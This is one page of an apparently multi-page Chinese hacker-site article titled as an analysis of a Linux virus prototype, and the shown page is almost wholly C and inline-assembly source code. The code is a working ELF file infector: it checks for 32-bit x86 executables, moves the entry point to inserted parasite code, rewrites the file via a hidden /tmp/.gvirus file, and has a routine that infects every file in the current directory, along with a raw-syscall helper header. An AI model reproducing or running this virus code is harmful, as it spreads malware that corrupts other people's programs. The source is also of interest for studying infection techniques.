一个Linux病毒原型分析 || 中国X黑客小组


	您现在的位置：中国X黑客小组 >> 技术文章 >> 安全防御 >> 病毒分析 >> 文章正文	用户登录新用户注册

一个Linux病毒原型分析

热荐 ★★★

【字体：小大】

一个Linux病毒原型分析

作者：grip2 文章来源：CnXHacker.Net 点击数：更新时间：2004-12-23

int tmp_flag;
int size;
unsigned char tmp_v_code[PAGE_SIZE];

char tmpfile[32] = {'/','t','m','p','/','.','g','v','i','r','u','s','\0'};

#ifndef NDEBUG
char err_type[32] = {'f','i','l','e',' ','t','y','p','e',' ','n','o','t',' ',
's','u','p','p','o','r','t','e','d','\n','\0'};
char luck[32] = {'B','e','t','t','e','r',' ','l','u','c','k',' ',
'n','e','x','t',' ','f','i','l','e','\n','\0'};
#endif

fd = g_open(file, O_RDWR, 0);
if (fd == -1) {
goto err;
}

if (g_fstat(fd, &stat) == -1) {
goto err;
}

ehdr = g_mmap2(0, stat.st_size, PROT_WRITE|PROT_READ, MAP_SHARED, fd, 0);
if (ehdr == MAP_FAILED) {
goto err;
}

/* Check ELF magic-ident */
if (ehdr->e_ident[EI_MAG0] != 0x7f
|| ehdr->e_ident[EI_MAG1] != 'E'
|| ehdr->e_ident[EI_MAG2] != 'L'
|| ehdr->e_ident[EI_MAG3] != 'F'
|| ehdr->e_ident[EI_CLASS] != ELFCLASS32
|| ehdr->e_ident[EI_DATA] != ELFDATA2LSB
|| ehdr->e_ident[EI_VERSION] != EV_CURRENT
|| ehdr->e_type != ET_EXEC
|| ehdr->e_machine != EM_386
|| ehdr->e_version != EV_CURRENT
) {
V_DEBUG_WRITE(1, &err_type, sizeof(err_type));
goto err;
}

align_code_size = PAGE_ALIGN(v_code_size);

/* Get program header and section header start address */
phdr = (Elf32_Phdr *) ((unsigned long) ehdr + ehdr->e_phoff);
shdr = (Elf32_Shdr *) ((unsigned long) ehdr + ehdr->e_shoff);

/* Locate the text segment */
txt_index = 0;
while (1) {
if (txt_index == ehdr->e_phnum - 1)
goto err;

if (phdr[txt_index].p_type == PT_LOAD
&& phdr[txt_index].p_flags == (PF_R|PF_X)) { /* text segment */
if (phdr[txt_index].p_vaddr + phdr[txt_index].p_filesz + align_code_size
> phdr[txt_index+1].p_vaddr) {
V_DEBUG_WRITE(1, &luck, sizeof(luck));
goto err;
}

break;
}
txt_index++;
}

/* Modify the entry point of the ELF */
org_entry = ehdr->e_entry;
ehdr->e_entry = phdr[txt_index].p_vaddr + phdr[txt_index].p_filesz;

new_code_pos =
(void *) ehdr + phdr[txt_index].p_offset + phdr[txt_index].p_filesz;

/* Increase the p_filesz and p_memsz of text segment
* for new code */
phdr[txt_index].p_filesz += align_code_size;
phdr[txt_index].p_memsz += align_code_size;

for (i = 0; i < ehdr->e_phnum; i++)
if (phdr[i].p_offset >= (unsigned long) new_code_pos - (unsigned long) ehdr)
phdr[i].p_offset += align_code_size;

tmp_flag = 0;
for (i = 0; i < ehdr->e_shnum; i++) {
if (shdr[i].sh_offset >= (unsigned long) new_code_pos - (unsigned long) ehdr) {
shdr[i].sh_offset += align_code_size;
if (!tmp_flag && i) { /* associating the new_code to the last
* section in the text segment */
shdr[i-1].sh_size += align_code_size;
tmp_flag = 1;
}
}
}

/* Increase p_shoff in the ELF header */
ehdr->e_shoff += align_code_size;

/* Make a new file */
tmp_fd = g_open(tmpfile, O_WRONLY|O_CREAT|O_TRUNC, stat.st_mode);
if (tmp_fd == -1) {
goto err;
}

size = new_code_pos - (void *) ehdr;
if (g_write(tmp_fd, ehdr, size) != size)
goto err;

__memcpy(tmp_v_code, v_code, v_code_size);
__memcpy(tmp_v_code + v_retaddr_addr_offset, &org_entry, sizeof(org_entry));
if (g_write(tmp_fd, tmp_v_code, align_code_size) != align_code_size) {
goto err;
}

if (g_write(tmp_fd, (void *) ehdr + size, stat.st_size - size)
!= stat.st_size - size) {
goto err;
}

g_close(tmp_fd);
g_munmap(ehdr, stat.st_size);
g_close(fd);

if (g_rename(tmpfile, file) == -1) {
goto err;
}

return 0;
err:
if (tmp_fd != -1)
g_close(tmp_fd);
if (ehdr)
g_munmap(ehdr, stat.st_size);
if (fd != -1)
g_close(fd);
return -1;
}

static inline void virus_code(void)
{
char dirdata[4096];
struct dirent *dirp;
int curfd;
int nbyte, c;
unsigned long para_code_start_addr;

__asm__ volatile (
"push %%eax\n\t"
"push %%ecx\n\t"
"push %%edx\n\t"
::);

char curdir[2] = {'.', 0};
char newline = '\n';

curdir[0] = '.';
curdir[1] = 0;
newline = '\n';

if ((curfd = g_open(curdir, O_RDONLY, 0)) < 0)
goto out;

/* Get start address of virus code */
__asm__ volatile (
"jmp get_start_addr\n"
"infect_start:\n\t"
"popl %0\n\t"
:"=m" (para_code_start_addr)
:);
para_code_start_addr -= PARACODE_RETADDR_ADDR_OFFSET - 1;

/* Infecting */
while ((nbyte = g_getdents(curfd, (struct dirent *)
&dirdata, sizeof(dirdata))) > 0) {
c = 0;
dirp = (struct dirent *) &dirdata;
do {
V_DEBUG_WRITE(1, dirp->d_name, dirp->d_reclen - (unsigned long)
&(((struct dirent *) 0)->d_name));
V_DEBUG_WRITE(1, &newline, sizeof(newline));

infect_virus(dirp->d_name,
(void *) para_code_start_addr,
PARACODE_LENGTH,
PARACODE_RETADDR_ADDR_OFFSET);

c += dirp->d_reclen;
if (c >= nbyte)
break;
dirp = (struct dirent *)((char *)dirp + dirp->d_reclen);
} while (1);
}
g_close(curfd);
out:
__asm__ volatile (
"popl %%edx\n\t"
"popl %%ecx\n\t"
"popl %%eax\n\t"
"addl $0x102c, %%esp\n\t"
"popl %%ebx\n\t"
"popl %%esi\n\t"
"popl %%edi\n\t"
"popl %%ebp\n\t"
"jmp return\n"
"get_start_addr:\n\t"
"call infect_start\n"
"return:\n\t"
"push $0xAABBCCDD\n\t" /* push ret_addr */
"ret\n"
::);
}

void parasite_code(void)
{
virus_code();
}
void parasite_code_end(void) {parasite_code();}
------------------------------ gvirus.c ------------------------------

------------------------------ gunistd.h ------------------------------
#ifndef _G2_UNISTD_
#define _G2_UNISTD_

#define g__syscall_return(type, res) \
do { \
if ((unsigned long)(res) >= (unsigned long)(-125)) { \
res = -1; \
} \
return (type) (res); \
} while (0)

#define g_syscall0(type,name) \
type g_##name(void) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__NR_##name)); \
g__syscall_return(type,__res); \
}

#define g_syscall1(type,name,type1,arg1) \
type g_##name(type1 arg1) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__NR_##name),"b" ((long)(arg1))); \
g__syscall_return(type,__res); \
}

#define g_syscall2(type,name,type1,arg1,type2,arg2) \
type g_##name(type1 arg1,type2 arg2) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2))); \
g__syscall_return(type,__res); \
}

#define g_syscall3(type,name,type1,arg1,type2,arg2,type3,arg3) \
type g_##name(type1 arg1,type2 arg2,type3 arg3) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \
"d" ((long)(arg3))); \
g__syscall_return(type,__res); \
}

#define g_syscall4(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4) \
type g_##name (type1 arg1, type2 arg2, type3 arg3, type4 arg4) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \
"d" ((long)(arg3)),"S" ((long)(arg4))); \
g__syscall_return(type,__res); \
}

#define g_syscall5(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4, \
type5,arg5) \
type g_##name (type1 arg1,type2 arg2,type3 arg3,type4 arg4,type5 arg5) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \
"d" ((long)(arg3)),"S" ((long)(arg4)),"D" ((long)(arg5))); \
g__syscall_return(type,__res); \
}

#define g_syscall6(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4, \
type5,arg5,type6,arg6) \
type g_##name (type1 arg1,type2 arg2,type3 arg3,type4 arg4,type5 arg5,type6 arg6) \
{ \
long __res; \
__asm__ volatile ("push %%ebp ; movl %%eax,%%ebp ; movl %1,%%eax ; int $0x80 ; pop %%ebp" \
: "=a" (__res) \
: "i" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \
"d" ((long)(arg3)),"S" ((long)(arg4)),"D" ((long)(arg5)), \
"0" ((long)(arg6))); \
g__syscall_return(type,__res); \
}

#endif /* _G2_UNISTD_ */
------------------------------ gunistd.h ------------------------------

------------------------------ gsyscall.h ------------

上一页 [1] [2] [3] [4] [5] 下一页

文章录入：IceRiver 责任编辑：IceRiver

上一篇文章：攻击Google和微软:W32.Erekez病毒分析

下一篇文章： QQ尾巴病毒的发送原理分析

【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

最新热点		最新推荐		相关文章
				如何分级防御针对Linux服务器活地运用SQL Injection做数据微软今日发布Windows Live测微软更新Live Home 加日历和微软报告称操作系统漏洞今年微软携安全厂商建统一战线 M 微软将开放Windows Live网络 Hotmail更新——Windows Liv 警惕：又一个通过 MSN传播的 Windows Live新主页类似Live

　网友评论：（只显示最新5条。评论内容只代表网友观点，与本站立场无关！）


关于我们 - 版权声明 - 帮助(？) - 广告服务 - 联系我们 - 友情链接 - 用户注册 -	Powered by ICE RIVER - STUDIO

» CnXHacker.CoM